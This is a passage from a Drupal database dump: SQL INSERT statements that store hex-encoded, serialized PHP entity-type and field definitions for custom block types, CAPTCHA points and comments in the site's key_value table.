5c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a35323a2254686520556e69782074696d657374616d70207768656e20746865207472616e736c6174696f6e2077617320637265617465642e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31323a227265766973696f6e61626c65223b623a313b733a31323a227472616e736c617461626c65223b623a313b733a383a2270726f7669646572223b733a31393a22636f6e74656e745f7472616e736c6174696f6e223b733a31303a226669656c645f6e616d65223b733a32373a22636f6e74656e745f7472616e736c6174696f6e5f63726561746564223b733a31313a22656e746974795f74797065223b733a31333a22626c6f636b5f636f6e74656e74223b733a363a2262756e646c65223b4e3b733a31333a22696e697469616c5f76616c7565223b4e3b7d733a31373a22002a006974656d446566696e6974696f6e223b4f3a35313a2244727570616c5c436f72655c4669656c645c5479706564446174615c4669656c644974656d44617461446566696e6974696f6e223a323a7b733a31333a22002a00646566696e6974696f6e223b613a323a7b733a343a2274797065223b733a31383a226669656c645f6974656d3a63726561746564223b733a383a2273657474696e6773223b613a303a7b7d7d733a31383a22002a006669656c64446566696e6974696f6e223b723a3734313b7d733a373a22002a0074797065223b733a373a2263726561746564223b733a393a22002a00736368656d61223b613a343a7b733a373a22636f6c756d6e73223b613a313a7b733a353a2276616c7565223b613a313a7b733a343a2274797065223b733a333a22696e74223b7d7d733a31313a22756e69717565206b657973223b613a303a7b7d733a373a22696e6465786573223b613a303a7b7d733a31323a22666f726569676e206b657973223b613a303a7b7d7d733a31303a22002a00696e6465786573223b613a303a7b7d7d7d);
INSERT INTO `key_value` (`collection`, `name`, `value`) VALUES
('entity.definitions.installed', 'block_content_type.entity_type', 0x4f3a34323a2244727570616c5c436f72655c436f6e6669675c456e746974795c436f6e666967456e7469747954797065223a34333a7b733a353a22002a006964223b733a31383a22626c6f636b5f636f6e74656e745f74797065223b733a383a22002a00636c617373223b733a34343a2244727570616c5c626c6f636b5f636f6e74656e745c456e746974795c426c6f636b436f6e74656e7454797065223b733a31313a22002a0070726f7669646572223b733a31333a22626c6f636b5f636f6e74656e74223b733a31353a22002a007374617469635f6361636865223b623a303b733a31353a22002a0072656e6465725f6361636865223b623a313b733a31393a22002a0070657273697374656e745f6361636865223b623a313b733a31343a22002a00656e746974795f6b657973223b613a383a7b733a323a226964223b733a323a226964223b733a353a226c6162656c223b733a353a226c6162656c223b733a383a227265766973696f6e223b733a303a22223b733a363a2262756e646c65223b733a303a22223b733a383a226c616e67636f6465223b733a383a226c616e67636f6465223b733a31363a2264656661756c745f6c616e67636f6465223b733a31363a2264656661756c745f6c616e67636f6465223b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b733a343a2275756964223b733a343a2275756964223b7d733a31363a22002a006f726967696e616c436c617373223b733a34343a2244727570616c5c626c6f636b5f636f6e74656e745c456e746974795c426c6f636b436f6e74656e7454797065223b733a31313a22002a0068616e646c657273223b613a353a7b733a343a22666f726d223b613a343a7b733a373a2264656661756c74223b733a34313a2244727570616c5c626c6f636b5f636f6e74656e745c426c6f636b436f6e74656e7454797065466f726d223b733a333a22616464223b733a34313a2244727570616c5c626c6f636b5f636f6e74656e745c426c6f636b436f6e74656e7454797065466f726d223b733a343a2265646974223b733a34313a2244727570616c5c626c6f636b5f636f6e74656e745c426c6f636b436f6e74656e7454797065466f726d223b733a363a2264656c657465223b733a35323a2244727570616c5c626c6f636b5f636f6e74656e745c466f726d5c426c6f636b436f6e74656e745479706544656c657465466f726d223b7d733a31343a22726f7574655f70726f7669646572223b613a323a7b733a343a2268746d6c223b733a34393a2244727570616c5c436f72655c456e746974795c526f7574696e675c41646d696e48746d6c526f75746550726f7669646572223b733a31313a227065726d697373696f6e73223b733a35383a2244727570616c5c757365725c456e746974795c456e746974795065726d697373696f6e73526f75746550726f766964657257697468436865636b223b7d733a31323a226c6973745f6275696c646572223b733a34383a2244727570616c5c626c6f636b5f636f6e74656e745c426c6f636b436f6e74656e74547970654c6973744275696c646572223b733a363a22616363657373223b733a34353a2244727570616c5c436f72655c456e746974795c456e74697479416363657373436f6e74726f6c48616e646c6572223b733a373a2273746f72616765223b733a34353a2244727570616c5c436f72655c436f6e6669675c456e746974795c436f6e666967456e7469747953746f72616765223b7d733a31393a22002a0061646d696e5f7065726d697373696f6e223b733a31373a2261646d696e697374657220626c6f636b73223b733a32353a22002a007065726d697373696f6e5f6772616e756c6172697479223b733a31313a22656e746974795f74797065223b733a383a22002a006c696e6b73223b613a343a7b733a31313a2264656c6574652d666f726d223b733a37313a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e742f6d616e6167652f7b626c6f636b5f636f6e74656e745f747970657d2f64656c657465223b733a393a22656469742d666f726d223b733a36343a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e742f6d616e6167652f7b626c6f636b5f636f6e74656e745f747970657d223b733a32333a22656e746974792d7065726d697373696f6e732d666f726d223b733a37363a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e742f6d616e6167652f7b626c6f636b5f636f6e74656e745f747970657d2f7065726d697373696f6e73223b733a31303a22636f6c6c656374696f6e223b733a34323a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e742f7479706573223b7d733a32313a22002a0062756e646c655f656e746974795f74797065223b4e3b733a31323a22002a0062756e646c655f6f66223b733a31333a22626c6f636b5f636f6e74656e74223b733a31353a22002a0062756e646c655f6c6162656c223b4e3b733a31333a22002a00626173655f7461626c65223b4e3b733a32323a22002a007265766973696f6e5f646174615f7461626c65223b4e3b733a31373a22002a007265766973696f6e5f7461626c65223b4e3b733a31333a22002a00646174615f7461626c65223b4e3b733a31313a22002a00696e7465726e616c223b623a303b733a31353a22002a007472616e736c617461626c65223b623a303b733a31393a22002a0073686f775f7265766973696f6e5f7569223b623a303b733a383a22002a006c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31373a22437573746f6d20626c6f636b2074797065223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31393a22002a006c6162656c5f636f6c6c656374696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a32303a22437573746f6d20626c6f636b206c696272617279223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31373a22002a006c6162656c5f73696e67756c6172223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31373a22637573746f6d20626c6f636b2074797065223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31353a22002a006c6162656c5f706c7572616c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31383a22637573746f6d20626c6f636b207479706573223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31343a22002a006c6162656c5f636f756e74223b613a333a7b733a383a2273696e67756c6172223b733a32343a2240636f756e7420637573746f6d20626c6f636b2074797065223b733a363a22706c7572616c223b733a32353a2240636f756e7420637573746f6d20626c6f636b207479706573223b733a373a22636f6e74657874223b4e3b7d733a31353a22002a007572695f63616c6c6261636b223b4e3b733a383a22002a0067726f7570223b733a31333a22636f6e66696775726174696f6e223b733a31343a22002a0067726f75705f6c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a22436f6e66696775726174696f6e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a313a7b733a373a22636f6e74657874223b733a31373a22456e7469747920747970652067726f7570223b7d7d733a32323a22002a006669656c645f75695f626173655f726f757465223b4e3b733a32363a22002a00636f6d6d6f6e5f7265666572656e63655f746172676574223b623a303b733a32323a22002a006c6973745f63616368655f636f6e7465787473223b613a303a7b7d733a31383a22002a006c6973745f63616368655f74616773223b613a313a7b693a303b733a33303a22636f6e6669673a626c6f636b5f636f6e74656e745f747970655f6c697374223b7d733a31343a22002a00636f6e73747261696e7473223b613a303a7b7d733a31333a22002a006164646974696f6e616c223b613a303a7b7d733a31343a22002a005f73657276696365496473223b613a303a7b7d733a31383a22002a005f656e7469747953746f7261676573223b613a303a7b7d733a32303a22002a00737472696e675472616e736c6174696f6e223b4e3b733a31363a22002a00636f6e6669675f707265666978223b733a343a2274797065223b733a31343a22002a006c6f6f6b75705f6b657973223b613a313a7b693a303b733a343a2275756964223b7d733a31363a22002a00636f6e6669675f6578706f7274223b613a343a7b693a303b733a323a226964223b693a313b733a353a226c6162656c223b693a323b733a383a227265766973696f6e223b693a333b733a31313a226465736372697074696f6e223b7d733a32313a22002a006d6572676564436f6e6669674578706f7274223b613a303a7b7d7d),
('entity.definitions.installed', 'captcha_point.entity_type', 0x4f3a34323a2244727570616c5c436f72655c436f6e6669675c456e746974795c436f6e666967456e7469747954797065223a34333a7b733a353a22002a006964223b733a31333a22636170746368615f706f696e74223b733a383a22002a00636c617373223b733a33343a2244727570616c5c636170746368615c456e746974795c43617074636861506f696e74223b733a31313a22002a0070726f7669646572223b733a373a2263617074636861223b733a31353a22002a007374617469635f6361636865223b623a303b733a31353a22002a0072656e6465725f6361636865223b623a313b733a31393a22002a0070657273697374656e745f6361636865223b623a313b733a31343a22002a00656e746974795f6b657973223b613a393a7b733a323a226964223b733a363a22666f726d4964223b733a353a226c6162656c223b733a353a226c6162656c223b733a363a22737461747573223b733a363a22737461747573223b733a383a227265766973696f6e223b733a303a22223b733a363a2262756e646c65223b733a303a22223b733a383a226c616e67636f6465223b733a383a226c616e67636f6465223b733a31363a2264656661756c745f6c616e67636f6465223b733a31363a2264656661756c745f6c616e67636f6465223b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b733a343a2275756964223b733a343a2275756964223b7d733a31363a22002a006f726967696e616c436c617373223b733a33343a2244727570616c5c636170746368615c456e746974795c43617074636861506f696e74223b733a31313a22002a0068616e646c657273223b613a343a7b733a31323a226c6973745f6275696c646572223b733a35363a2244727570616c5c636170746368615c456e746974795c436f6e74726f6c6c65725c43617074636861506f696e744c6973744275696c646572223b733a343a22666f726d223b613a353a7b733a333a22616464223b733a33363a2244727570616c5c636170746368615c466f726d5c43617074636861506f696e74466f726d223b733a343a2265646974223b733a33363a2244727570616c5c636170746368615c466f726d5c43617074636861506f696e74466f726d223b733a373a2264697361626c65223b733a34333a2244727570616c5c636170746368615c466f726d5c43617074636861506f696e7444697361626c65466f726d223b733a363a22656e61626c65223b733a34323a2244727570616c5c636170746368615c466f726d5c43617074636861506f696e74456e61626c65466f726d223b733a363a2264656c657465223b733a34323a2244727570616c5c636170746368615c466f726d5c43617074636861506f696e7444656c657465466f726d223b7d733a363a22616363657373223b733a34353a2244727570616c5c436f72655c456e746974795c456e74697479416363657373436f6e74726f6c48616e646c6572223b733a373a2273746f72616765223b733a34353a2244727570616c5c436f72655c436f6e6669675c456e746974795c436f6e666967456e7469747953746f72616765223b7d733a31393a22002a0061646d696e5f7065726d697373696f6e223b733a32373a2261646d696e697374657220434150544348412073657474696e6773223b733a32353a22002a007065726d697373696f6e5f6772616e756c6172697479223b733a31313a22656e746974795f74797065223b733a383a22002a006c696e6b73223b613a343a7b733a393a22656469742d666f726d223b733a35393a222f61646d696e2f636f6e6669672f70656f706c652f636170746368612f636170746368612d706f696e74732f7b636170746368615f706f696e747d223b733a373a2264697361626c65223b733a36373a222f61646d696e2f636f6e6669672f70656f706c652f636170746368612f636170746368612d706f696e74732f7b636170746368615f706f696e747d2f64697361626c65223b733a363a22656e61626c65223b733a36363a222f61646d696e2f636f6e6669672f70656f706c652f636170746368612f636170746368612d706f696e74732f7b636170746368615f706f696e747d2f656e61626c65223b733a31313a2264656c6574652d666f726d223b733a36363a222f61646d696e2f636f6e6669672f70656f706c652f636170746368612f636170746368612d706f696e74732f7b636170746368615f706f696e747d2f64656c657465223b7d733a32313a22002a0062756e646c655f656e746974795f74797065223b4e3b733a31323a22002a0062756e646c655f6f66223b4e3b733a31353a22002a0062756e646c655f6c6162656c223b4e3b733a31333a22002a00626173655f7461626c65223b4e3b733a32323a22002a007265766973696f6e5f646174615f7461626c65223b4e3b733a31373a22002a007265766973696f6e5f7461626c65223b4e3b733a31333a22002a00646174615f7461626c65223b4e3b733a31313a22002a00696e7465726e616c223b623a303b733a31353a22002a007472616e736c617461626c65223b623a303b733a31393a22002a0073686f775f7265766973696f6e5f7569223b623a303b733a383a22002a006c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a224361707463686120506f696e74223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31393a22002a006c6162656c5f636f6c6c656374696f6e223b733a303a22223b733a31373a22002a006c6162656c5f73696e67756c6172223b733a303a22223b733a31353a22002a006c6162656c5f706c7572616c223b733a303a22223b733a31343a22002a006c6162656c5f636f756e74223b613a303a7b7d733a31353a22002a007572695f63616c6c6261636b223b4e3b733a383a22002a0067726f7570223b733a31333a22636f6e66696775726174696f6e223b733a31343a22002a0067726f75705f6c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a22436f6e66696775726174696f6e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a313a7b733a373a22636f6e74657874223b733a31373a22456e7469747920747970652067726f7570223b7d7d733a32323a22002a006669656c645f75695f626173655f726f757465223b4e3b733a32363a22002a00636f6d6d6f6e5f7265666572656e63655f746172676574223b623a303b733a32323a22002a006c6973745f63616368655f636f6e7465787473223b613a303a7b7d733a31383a22002a006c6973745f63616368655f74616773223b613a313a7b693a303b733a383a2272656e6465726564223b7d733a31343a22002a00636f6e73747261696e7473223b613a303a7b7d733a31333a22002a006164646974696f6e616c223b613a313a7b733a31303a22746f6b656e5f74797065223b733a31333a22636170746368615f706f696e74223b7d733a31343a22002a005f73657276696365496473223b613a303a7b7d733a31383a22002a005f656e7469747953746f7261676573223b613a303a7b7d733a32303a22002a00737472696e675472616e736c6174696f6e223b4e3b733a31363a22002a00636f6e6669675f707265666978223b733a31333a22636170746368615f706f696e74223b733a31343a22002a006c6f6f6b75705f6b657973223b613a313a7b693a303b733a343a2275756964223b7d733a31363a22002a00636f6e6669675f6578706f7274223b613a343a7b693a303b733a363a22666f726d4964223b693a313b733a31313a226361707463686154797065223b693a323b733a353a226c6162656c223b693a333b733a343a2275756964223b7d733a32313a22002a006d6572676564436f6e6669674578706f7274223b613a303a7b7d7d),
('entity.definitions.installed', 'comment.entity_type', 0x4f3a33363a2244727570616c5c436f72655c456e746974795c436f6e74656e74456e7469747954797065223a34303a7b733a353a22002a006964223b733a373a22636f6d6d656e74223b733a383a22002a00636c617373223b733a32393a2244727570616c5c636f6d6d656e745c456e746974795c436f6d6d656e74223b733a31313a22002a0070726f7669646572223b733a373a22636f6d6d656e74223b733a31353a22002a007374617469635f6361636865223b623a313b733a31353a22002a0072656e6465725f6361636865223b623a313b733a31393a22002a0070657273697374656e745f6361636865223b623a313b733a31343a22002a00656e746974795f6b657973223b613a31303a7b733a323a226964223b733a333a22636964223b733a363a2262756e646c65223b733a31323a22636f6d6d656e745f74797065223b733a353a226c6162656c223b733a373a227375626a656374223b733a383a226c616e67636f6465223b733a383a226c616e67636f6465223b733a343a2275756964223b733a343a2275756964223b733a393a227075626c6973686564223b733a363a22737461747573223b733a353a226f776e6572223b733a333a22756964223b733a383a227265766973696f6e223b733a303a22223b733a31363a2264656661756c745f6c616e67636f6465223b733a31363a2264656661756c745f6c616e67636f6465223b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b7d733a31363a22002a006f726967696e616c436c617373223b733a32393a2244727570616c5c636f6d6d656e745c456e746974795c436f6d6d656e74223b733a31313a22002a0068616e646c657273223b613a383a7b733a373a2273746f72616765223b733a32393a2244727570616c5c636f6d6d656e745c436f6d6d656e7453746f72616765223b733a31343a2273746f726167655f736368656d61223b733a33353a2244727570616c5c636f6d6d656e745c436f6d6d656e7453746f72616765536368656d61223b733a363a22616363657373223b733a34323a2244727570616c5c636f6d6d656e745c436f6d6d656e74416363657373436f6e74726f6c48616e646c6572223b733a31323a226c6973745f6275696c646572223b733a33363a2244727570616c5c436f72655c456e746974795c456e746974794c6973744275696c646572223b733a31323a22766965775f6275696c646572223b733a33333a2244727570616c5c636f6d6d656e745c436f6d6d656e74566965774275696c646572223b733a31303a2276696577735f64617461223b733a33313a2244727570616c5c636f6d6d656e745c436f6d6d656e74566965777344617461223b733a343a22666f726d223b613a323a7b733a373a2264656661756c74223b733a32363a2244727570616c5c636f6d6d656e745c436f6d6d656e74466f726d223b733a363a2264656c657465223b733a33303a2244727570616c5c636f6d6d656e745c466f726d5c44656c657465466f726d223b7d733a31313a227472616e736c6174696f6e223b733a34303a2244727570616c5c636f6d6d656e745c436f6d6d656e745472616e736c6174696f6e48616e646c6572223b7d733a31393a22002a0061646d696e5f7065726d697373696f6e223b4e3b733a32353a22002a007065726d697373696f6e5f6772616e756c6172697479223b733a31313a22656e746974795f74797065223b733a383a22002a006c696e6b73223b613a353a7b733a393a2263616e6f6e6963616c223b733a31383a222f636f6d6d656e742f7b636f6d6d656e747d223b733a31313a2264656c6574652d666f726d223b733a32353a222f636f6d6d656e742f7b636f6d6d656e747d2f64656c657465223b733a32303a2264656c6574652d6d756c7469706c652d666f726d223b733a32393a222f61646d696e2f636f6e74656e742f636f6d6d656e742f64656c657465223b733a393a22656469742d666f726d223b733a32333a222f636f6d6d656e742f7b636f6d6d656e747d2f65646974223b733a363a22637265617465223b733a383a222f636f6d6d656e74223b7d733a32313a22002a0062756e646c655f656e746974795f74797065223b733a31323a22636f6d6d656e745f74797065223b733a31323a22002a0062756e646c655f6f66223b4e3b733a31353a22002a0062756e646c655f6c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31323a22436f6d6d656e742074797065223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31333a22002a00626173655f7461626c65223b733a373a22636f6d6d656e74223b733a32323a22002a007265766973696f6e5f646174615f7461626c65223b4e3b733a31373a22002a007265766973696f6e5f7461626c65223b4e3b733a31333a22002a00646174615f7461626c65223b733a31383a22636f6d6d656e745f6669656c645f64617461223b733a31313a22002a00696e7465726e616c223b623a303b733a31353a22002a007472616e736c617461626c65223b623a313b733a31393a22002a0073686f775f7265766973696f6e5f7569223b623a303b733a383a22002a006c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a373a22436f6d6d656e74223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31393a22002a006c6162656c5f636f6c6c656374696f6e223b733a303a22223b733a31373a22002a006c6162656c5f73696e67756c6172223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a373a22636f6d6d656e74223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31353a22002a006c6162656c5f706c7572616c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a383a22636f6d6d656e7473223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31343a22002a006c6162656c5f636f756e74223b613a333a7b733a383a2273696e67756c6172223b733a31343a2240636f756e7420636f6d6d656e74223b733a363a22706c7572616c223b733a31353a2240636f756e7420636f6d6d656e7473223b733a373a22636f6e74657874223b4e3b7d733a31353a22002a007572695f63616c6c6261636b223b733a31313a22636f6d6d656e745f757269223b733a383a22002a0067726f7570223b733a373a22636f6e74656e74223b733a31343a22002a0067726f75705f6c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a373a22436f6e74656e74223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a313a7b733a373a22636f6e74657874223b733a31373a22456e7469747920747970652067726f7570223b7d7d733a32323a22002a006669656c645f75695f626173655f726f757465223b733a32393a22656e746974792e636f6d6d656e745f747970652e656469745f666f726d223b733a32363a22002a00636f6d6d6f6e5f7265666572656e63655f746172676574223b623a303b733a32323a22002a006c6973745f63616368655f636f6e7465787473223b613a303a7b7d733a31383a22002a006c6973745f63616368655f74616773223b613a313a7b693a303b733a31323a22636f6d6d656e745f6c697374223b7d733a31343a22002a00636f6e73747261696e7473223b613a333a7b733a31313a22436f6d6d656e744e616d65223b613a303a7b7d733a31333a22456e746974794368616e676564223b4e3b733a32363a22456e74697479556e7472616e736c617461626c654669656c6473223b4e3b7d733a31333a22002a006164646974696f6e616c223b613a303a7b7d733a31343a22002a005f73657276696365496473223b613a303a7b7d733a31383a22002a005f656e7469747953746f7261676573223b613a303a7b7d733a32303a22002a00737472696e675472616e736c6174696f6e223b4e3b733a32353a22002a007265766973696f6e5f6d657461646174615f6b657973223b613a313a7b733a31363a227265766973696f6e5f64656661756c74223b733a31363a227265766973696f6e5f64656661756c74223b7d7d);
INSERT INTO `key_value` (`collection`, `name`, `value`) VALUES
('entity.definitions.installed', 'comment.field_storage_definitions', 0x613a32303a7b733a333a22636964223b4f3a33373a2244727570616c5c436f72655c4669656c645c426173654669656c64446566696e6974696f6e223a353a7b733a31333a22002a00646566696e6974696f6e223b613a383a7b733a353a226c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31303a22436f6d6d656e74204944223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a393a22726561642d6f6e6c79223b623a313b733a31313a226465736372697074696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31353a2254686520636f6d6d656e742049442e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a383a2270726f7669646572223b733a373a22636f6d6d656e74223b733a31303a226669656c645f6e616d65223b733a333a22636964223b733a31313a22656e746974795f74797065223b733a373a22636f6d6d656e74223b733a363a2262756e646c65223b4e3b733a31333a22696e697469616c5f76616c7565223b4e3b7d733a31373a22002a006974656d446566696e6974696f6e223b4f3a35313a2244727570616c5c436f72655c4669656c645c5479706564446174615c4669656c644974656d44617461446566696e6974696f6e223a323a7b733a31333a22002a00646566696e6974696f6e223b613a323a7b733a343a2274797065223b733a31383a226669656c645f6974656d3a696e7465676572223b733a383a2273657474696e6773223b613a363a7b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a333a226d696e223b733a303a22223b733a333a226d6178223b733a303a22223b733a363a22707265666978223b733a303a22223b733a363a22737566666978223b733a303a22223b7d7d733a31383a22002a006669656c64446566696e6974696f6e223b723a323b7d733a373a22002a0074797065223b733a373a22696e7465676572223b733a393a22002a00736368656d61223b613a343a7b733a373a22636f6c756d6e73223b613a313a7b733a353a2276616c7565223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b7d7d733a31313a22756e69717565206b657973223b613a303a7b7d733a373a22696e6465786573223b613a303a7b7d733a31323a22666f726569676e206b657973223b613a303a7b7d7d733a31303a22002a00696e6465786573223b613a303a7b7d7d733a343a2275756964223b4f3a33373a2244727570616c5c436f72655c4669656c645c426173654669656c64446566696e6974696f6e223a353a7b733a31333a22002a00646566696e6974696f6e223b613a383a7b733a353a226c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a343a2255554944223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a393a22726561642d6f6e6c79223b623a313b733a31313a226465736372697074696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31373a2254686520636f6d6d656e7420555549442e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a383a2270726f7669646572223b733a373a22636f6d6d656e74223b733a31303a226669656c645f6e616d65223b733a343a2275756964223b733a31313a22656e746974795f74797065223b733a373a22636f6d6d656e74223b733a363a2262756e646c65223b4e3b733a31333a22696e697469616c5f76616c7565223b4e3b7d733a31373a22002a006974656d446566696e6974696f6e223b4f3a35313a2244727570616c5c436f72655c4669656c645c5479706564446174615c4669656c644974656d44617461446566696e6974696f6e223a323a7b733a31333a22002a00646566696e6974696f6e223b613a323a7b733a343a2274797065223b733a31353a226669656c645f6974656d3a75756964223b733a383a2273657474696e6773223b613a333a7b733a31303a226d61785f6c656e677468223b693a3132383b733a383a2269735f6173636969223b623a313b733a31343a22636173655f73656e736974697665223b623a303b7d7d733a31383a22002a006669656c64446566696e6974696f6e223b723a34303b7d733a373a22002a0074797065223b733a343a2275756964223b733a393a22002a00736368656d61223b613a343a7b733a373a22636f6c756d6e73223b613a313a7b733a353a2276616c7565223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3132383b733a363a2262696e617279223b623a303b7d7d733a31313a22756e69717565206b657973223b613a313a7b733a353a2276616c7565223b613a313a7b693a303b733a353a2276616c7565223b7d7d733a373a22696e6465786573223b613a303a7b7d733a31323a22666f726569676e206b657973223b613a303a7b7d7d733a31303a22002a00696e6465786573223b613a303a7b7d7d733a383a226c616e67636f6465223b4f3a33373a2244727570616c5c436f72655c4669656c645c426173654669656c64446566696e6974696f6e223a353a7b733a31333a22002a00646566696e6974696f6e223b613a393a7b733a353a226c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a383a224c616e6775616765223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a373a22646973706c6179223b613a323a7b733a343a2276696577223b613a313a7b733a373a226f7074696f6e73223b613a313a7b733a363a22726567696f6e223b733a363a2268696464656e223b7d7d733a343a22666f726d223b613a313a7b733a373a226f7074696f6e73223b613a323a7b733a343a2274797065223b733a31353a226c616e67756167655f73656c656374223b733a363a22776569676874223b693a323b7d7d7d733a31323a227472616e736c617461626c65223b623a313b733a31313a226465736372697074696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a32363a2254686520636f6d6d656e74206c616e677561676520636f64652e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a383a2270726f7669646572223b733a373a22636f6d6d656e74223b733a31303a226669656c645f6e616d65223b733a383a226c616e67636f6465223b733a31313a22656e746974795f74797065223b733a373a22636f6d6d656e74223b733a363a2262756e646c65223b4e3b733a31333a22696e697469616c5f76616c7565223b4e3b7d733a31373a22002a006974656d446566696e6974696f6e223b4f3a35313a2244727570616c5c436f72655c4669656c645c5479706564446174615c4669656c644974656d44617461446566696e6974696f6e223a323a7b733a31333a22002a00646566696e6974696f6e223b613a323a7b733a343a2274797065223b733a31393a226669656c645f6974656d3a6c616e6775616765223b733a383a2273657474696e6773223b613a303a7b7d7d733a31383a22002a006669656c64446566696e6974696f6e223b723a37373b7d733a373a22002a0074797065223b733a383a226c616e6775616765223b733a393a22002a00736368656d61223b613a343a7b733a373a22636f6c756d6e73223b613a313a7b733a353a2276616c7565223b613a323a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a31323b7d7d733a31313a22756e69717565206b657973223b613a303a7b7d733a373a22696e6465786573223b613a303a7b7d733a31323a22666f726569676e206b657973223b613a303a7b7d7d733a31303a22002a00696e6465786573223b613a303a7b7d7d733a31323a22636f6d6d656e745f74797065223b4f3a33373a2244727570616c5c436f72655c4669656c645c426173654669656c64446566696e6974696f6e223a353a7b733a31333a22002a00646566696e6974696f6e223b613a393a7b733a353a226c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e6754